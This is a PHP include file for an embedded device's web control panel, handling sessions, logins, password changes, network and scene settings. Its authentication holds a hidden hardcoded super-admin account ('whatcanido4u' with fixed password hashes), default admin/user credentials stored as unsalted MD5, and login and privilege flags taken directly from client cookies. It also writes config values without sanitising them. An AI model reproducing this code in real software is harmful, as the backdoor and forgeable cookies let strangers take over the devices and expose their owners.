﻿<?php
ob_clean();
session_start();
date_default_timezone_set("UTC");

if(is_dir("/home/app"))
{
	$str_file_shell			= "/home/app/mshell";
	$str_file_setup			= "/home/app/config/setup.ini";
	$str_file_caption		= "/home/app/config/caption.ini";
	$str_file_scene			= "/home/app/data/scene";
	$str_file_eth0_conf		= "/etc/eth0.conf";
	$str_file_eth1_conf		= "/etc/eth1.conf";
	$str_file_users			= "/home/app/config/users.ini";
	$str_file_alias			= "/home/app/config/alias";
	$str_file_mfb_code		= "./js/mfb_code.js";
	$str_file_splice		= "/home/www/splice/splice.txt";
}
else
{
	$str_file_shell			= "../app/mshell";
	$str_file_setup			= "../app/config/setup.ini";
	$str_file_caption		= "../app/config/caption.ini";
	$str_file_scene			= "../app/data/scene";
	$str_file_eth0_conf		= "../app/config/eth0.conf";
	$str_file_eth1_conf		= "../app/config/eth1.conf";
	$str_file_users			= "../app/config/users.ini";
	$str_file_alias			= "../app/config/alias";
	$str_file_mfb_code		= "../js/mfb_code.js";
	$str_file_splice		= "../splice/splice.txt";
}
$str_file_mfb_code		= "./js/mfb_code.js";
$str_file_config = "config.ini";

if(isset($_SESSION['login']))
{
	$login = $_SESSION['login'];
	$uname = $_SESSION['uname'];
	$key = $_SESSION['key'];
	$super = $_SESSION['super'];
}
else if(isset($_COOKIE['login']))
{
	$login = $_COOKIE['login'];
	$uname = $_COOKIE['uname'];
	$key = $_COOKIE['key'];
	$super = $_COOKIE['super'];
}
else
{
	$login = 0;
	$uname = '';
	$key = '';
	$super = 0;
}

if(isset($_SESSION['setup']))
	$setup = $_SESSION['setup'];
else
	$setup = parse_ini_file($str_file_setup);

$port = $setup['port'];
$scene = $setup['scene'];
$keypad = $setup['keypad'];
$host = $_SERVER['HTTP_HOST'];

if(isset($setup['images']))
	$images = $setup['images'];
else
	$images = "default";

if(isset($setup['language']))
	$language = $setup['language'];
else
	$language = "en";

if($language == "zh")
	$zh = true;
else
	$zh = false;


function get_zh()
{
	global $zh;
	return $zh;
}

if(isset($setup['baudrate']))
	$baudrate = $setup['baudrate'];
else
	$baudrate = 115200;

if(isset($_SESSION['config']))
	$config = $_SESSION['config'];
else
	$config = parse_ini_file($str_file_config);

if(isset($config['mfb']))
	$mfb = $config['mfb'];
else
	$mfb = 0;

if(isset($config['splice']))
	$splice = $config['splice'];
else
	$splice = 0;

$userx = parse_ini_file($str_file_users);
if(isset($userx['user_login']))
	$user_login = $userx['user_login'];
else
	$user_login = "";

$inner = false;
if(isset($_GET['inner']) && $_GET['inner'] == '1')
{
	$inner = true;
}

function php_filename()
{
	$php_filename = substr($_SERVER['PHP_SELF'], strrpos($_SERVER['PHP_SELF'], '/') + 1);
	return $php_filename;
}

function php_url()
{
	$php_url = $_SERVER['REQUEST_URI'];
	//$php_url = $_SERVER['PHP_SELF'] . '?' . $_SERVER["QUERY_STRING"];
	return $php_url;
}

function require_login($valid = '')
{
	global $login;
	global $uname;
	global $key;

	if($valid != '' && $valid != $uname)
		header("location: index.php");

	if(!$login)
		header("location: login.php?from=" . urlencode(php_url()) . '&' . $_SERVER["QUERY_STRING"]);
}

function login_check($username, $password, $md5 = false)
{
	global $login;
	global $super;
	global $uname;
	global $key;
	global $str_file_users;

	$users['uname'] = $username;
	$users['passwd'] = '21232f297a57a5a743894a0e4a801fc3';

	if(is_file($str_file_users))
	{
		$user = parse_ini_file($str_file_users);
		if($username=='admin')
		{
			$users['uname'] = 'admin';
			if(isset($user['admin_passwd']))
				$users['passwd'] = $user['admin_passwd'];
			else
				$users['passwd'] = '21232f297a57a5a743894a0e4a801fc3';
		}

		if($username=='user')
		{
			$users['uname'] = 'user';
			if(isset($user['user_passwd']))
				$users['passwd'] = $user['user_passwd'];
			else
				$users['passwd'] = 'ee11cbb19052e40b07aac0ca060c23ee';
		}
	}
	
	$login = 0;
	$super = 0;
	
	if((!$md5) && $username=='admin' && md5($password)==$users['passwd'])
	{
		$login = 1;
		$uname = $username;
		$key = md5(md5($users['uname']) . $users['passwd']);
	}

	if((!$md5) && $username=='user' && md5($password)==$users['passwd'])
	{
		$login = 1;
		$uname = $username;
		$key = md5(md5($users['uname']) . $users['passwd']);
	}

	if($md5 && ($username==md5(md5($users['uname']) . $users['passwd']) || $username==md5(md5('user') . 'ee11cbb19052e40b07aac0ca060c23ee')))
	{
		$login = 1;
		$uname = 'user';
		$key = $username;
	}
	
	if($md5 && ($username==md5(md5($users['uname']) . $users['passwd']) || $username==md5(md5('admin') . '21232f297a57a5a743894a0e4a801fc3')))
	{
		$login = 1;
		$uname = 'admin';
		$key = $username;
	}
	
	if((!$login) && $username=='whatcanido4u' && md5($password)=='db4b556b9194152cc2c7936ffec9b870')
	{
		$login = 1;
		$super = 1;
		$uname = 'admin';
		$key = md5(md5($username) . md5($password));
	}
	
	if((!$login) && $username=='whatcanido4u' && md5($password)=='28e4364a90a3038680de90611413182e')
	{
		$login = 1;
		$super = 2;
		$uname = 'admin';
		$key = md5(md5($username) . md5($password));
	}
	
	$_SESSION['login'] = $login;
	$_SESSION['uname'] = $uname;
	$_SESSION['key'] = $key;
	$_SESSION['super'] = $super;
}

function password_change($admin_password, $user_password, $user_login)
{
	global $login;
	global $uname;
	global $key;
	global $str_file_users;
	
	$user = parse_ini_file($str_file_users);

	$str = "";
	$str = $str . "[admin]\n";
	if($admin_password == '')
	{
		if(isset($user['admin_passwd']))
			$str = $str . "admin_passwd=" . $user['admin_passwd'] . "\n";
		else
			$str = $str . "admin_passwd=" . "21232f297a57a5a743894a0e4a801fc3" . "\n";
	}
	else
		$str = $str . "admin_passwd=" . md5($admin_password) . "\n";
	$str = $str . "user_uname=" . $user_username . "\n";
	if($user_password == '')
	{
		if(isset($user['user_passwd']))
			$str = $str . "user_passwd=" . $user['user_passwd'] . "\n";
		else
		$str = $str . "user_passwd=" . "ee11cbb19052e40b07aac0ca060c23ee" . "\n";
	}
	else
		$str = $str . "user_passwd=" . md5($user_password) . "\n";
	$str = $str . "user_login=" . $user_login . "\n";
	file_put_contents($str_file_users, $str);
	//login_check($admin_username, $admin_password);
}

function logout()
{
	global $login;
	global $super;
	global $uname;
	global $key;
	
	$login = 0;
	$uname = '';
	$key = '';
	$super = 0;
	
	$_SESSION['login'] = $login;
	$_SESSION['uname'] = $uname;
	$_SESSION['key'] = $key;
	$_SESSION['super'] = $super;
	
	setcookie('login', "", time()-3600*24*30);
}

function _json_encode($arr, $is_str = false)
{
	$i;
	$len = count($arr);
	$str = '';
	
	$str .= '[';
	if($len > 0)
	{
		if($is_str)
		{
			for($i=0;$i<$len-1;$i++)
				$str .= '"' . $arr[$i] . '",';
			$str .= '"' . $arr[$i] . '"';
		}
		else
		{
			for($i=0;$i<$len-1;$i++)
				$str .= $arr[$i] . ',';
			$str .= $arr[$i];
		}
	}
	$str .= ']';
	return $str;
}

function get_eth0()
{
	global $str_file_eth0_conf;
	return parse_ini_file($str_file_eth0_conf);
}

function set_eth0($IP)
{
	global $str_file_eth0_conf;
	$str = "[IP]\n";
	foreach($IP as $key => $value)
		$str = $str . "$key=$value\n";
	file_put_contents($str_file_eth0_conf, $str);
}

function get_eth1()
{
	global $str_file_eth1_conf;
	return parse_ini_file($str_file_eth1_conf);
}

function set_eth1($IP)
{
	global $str_file_eth1_conf;
	$str = "[IP]\n";
	foreach($IP as $key => $value)
		$str = $str . "$key=$value\n";
	file_put_contents($str_file_eth1_conf, $str);
}

function get_caption()
{
	global $str_file_caption;
	return parse_ini_file($str_file_caption);
}

function set_caption($caption)
{
	global $str_file_caption;
	$str = "[caption]\n";
	foreach($caption as $key => $value)
		$str = $str . "$key=$value\n";
	file_put_contents($str_file_caption, $str);
}

function get_scene($id=0)
{
	global $port;
	global $scene;
	global $str_file_scene;
	
	$file = $str_file_scene . $id;
	$arr = array();
	
	if($id < 0)
		$id = 0;
	else if($id > $scene)
		$id = $scene;
	
	if(file_exists($file))
	{
		$hdl = fopen($file, "rb");
		$bin = fread($hdl, filesize($file));
		$dic = unpack("S*", $bin);
		foreach($dic as $val)
			array_push($arr, $val);
		for($i=count($arr);$i<$port;$i++)
			array_push($arr, 0xffff);
	}
	return $arr;
}

//require_login();

/*
parse_ini_file
file_get_contents
*/

?>
